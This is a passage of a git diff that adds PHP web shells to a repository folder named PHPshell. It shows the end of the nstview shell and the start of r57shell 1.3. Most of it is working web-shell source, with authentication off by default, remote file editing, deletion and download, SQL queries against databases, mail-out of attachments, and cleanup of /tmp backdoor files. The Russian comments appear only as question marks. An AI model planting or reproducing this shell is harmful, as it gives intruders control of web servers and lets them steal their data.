+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){ 
+$editf=stripslashes($editf); +} + +$f=fopen($filename,"w+"); +fwrite($f,"$editf"); +echo "<br> +<b>File edited.</b> +<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">"; +exit; +} +echo $copyr; +exit; +} + + + +echo" +<table width=100% cellpadding=1 cellspacing=0 class=hack> +<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr> +"; +$dirs=array(); +$files=array(); +$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>"); +while (!(($file = readdir($dh)) === false)) { +if ($file=="." || $file=="..") continue; +if (@is_dir("$d/$file")) { + $dirs[]=$file; +}else{ + $files[]=$file; + } + sort($dirs); + sort($files); + +$fz=@filesize("$d/$file"); +} + +function perm($perms){ +if (($perms & 0xC000) == 0xC000) { + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + $info = 'p'; +} else { + $info = 'u'; +} +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 
'T' : '-')); +return $info; +} + + +for($i=0; $i<count($dirs); $i++){ + +$perms = @fileperms($d."/".$dirs[$i]); +$owner = @fileowner($d."/".$dirs[$i]); +if($os=="unix"){ +$fileownera=posix_getpwuid($owner); +$owner=$fileownera['name']; +} +$group = @filegroup($d."/".$dirs[$i]); +if($os=="unix"){ +$groupinfo = posix_getgrgid($group); +$group=$groupinfo['name']; +} +$info=perm($perms); +if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";} +$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>"; +$linkd=str_replace("//","/",$linkd); +echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>"; +} + +for($i=0; $i<count($files); $i++){ + +$size=@filesize($d."/".$files[$i]); +$perms = @fileperms($d."/".$files[$i]); +$owner = @fileowner($d."/".$files[$i]); +if($os=="unix"){ +$fileownera=posix_getpwuid($owner); +$owner=$fileownera['name']; +} +$group = @filegroup($d."/".$files[$i]); +if($os=="unix"){ +$groupinfo = posix_getgrgid($group); +$group=$groupinfo['name']; +} +$info=perm($perms); +if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";} + +if ($size < 1024){$siz=$size.' b'; +}else{ +if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{ +if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{ +if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' 
gb';} +}}} +echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>"; +} + +echo "</table></td></tr></table>"; +echo $copyr; + +?> +<!-- Network security team :: nst.void.ru --> \ No newline at end of file diff --git a/php/PHPshell/nstview/nstview2.jpg b/php/PHPshell/nstview/nstview2.jpg new file mode 100644 index 0000000..ac31115 Binary files /dev/null and b/php/PHPshell/nstview/nstview2.jpg differ diff --git a/php/PHPshell/r57shell/r57shell.jpg b/php/PHPshell/r57shell/r57shell.jpg new file mode 100644 index 0000000..d2ff4c3 Binary files /dev/null and b/php/PHPshell/r57shell/r57shell.jpg differ diff --git a/php/PHPshell/r57shell/r57shell.php b/php/PHPshell/r57shell/r57shell.php new file mode 100644 index 0000000..9bd2008 --- /dev/null +++ b/php/PHPshell/r57shell/r57shell.php 
@@ -0,0 +1,2187 @@ +<?phpr57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ??????? +/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru +/* ??????: 1.3 (05.03.2006) +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC. +/* ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ?????? +/* ?? rst@void.ru. ??? ??????????? ????? ???????????. +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by 1dt.w0lf +/* RST/GHC http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/******************************************************************************************************/ +/* ~~~ ????????? | Options ~~~ */ + +// ????? ????? | Language +// $language='ru' - ??????? (russian) +// $language='eng' - english (??????????) +$language='eng'; + +// ?????????????? | Authentification +// $auth = 1; - ?????????????? ???????? ( authentification = On ) +// $auth = 0; - ?????????????? ????????? ( authentification = Off ) +$auth = 0; + +// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access) +// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!) +// ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'r57' +// Login & password crypted with md5, default is 'r57' +$name='ec371748dc2da624b35a4f8f685dd122'; // ????? ???????????? (user login) +$pass='ec371748dc2da624b35a4f8f685dd122'; // ?????? ???????????? 
(user password) +/******************************************************************************************************/ +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "1.3"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="r57shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); + } +} +$head = '<!-- ?????????? ???? --> +<html> +<head> +<title>WwW.SeCuReDeAtH.cOm</title> +<meta http-equiv="Content-Language" content="ar-sa"> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #eeeeee 1px outset; +BORDER-LEFT: #eeeeee 1px 
outset; +BORDER-BOTTOM: #eeeeee 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . 
$dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . 
+ "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + 
if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + 
break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + 
$this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' 
('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(isset($_GET['img'])&&!empty($_GET['img'])) + { + $images = array(); + $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; + $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; + @ob_clean(); + header("Content-type: image/gif"); + echo base64_decode($images[$_GET['img']]); + die(); + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . 
$content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + + if(!$sql->connect()) echo "<div align=center><font face=Verdana size=2 color=red><b>Can't connect to SQL server</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=2 color=red><b>Can't select database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "<font face=Verdana size=2 color=green><b>Query#".$num." 
: ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=Verdana size=2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#cccccc><font face=Verdana size=2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=Verdana size=2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=Verdana size=2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { 
+ @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=2><b>'.$key.'</b></font></td><td><font face=Verdana size=2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2 
color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? 
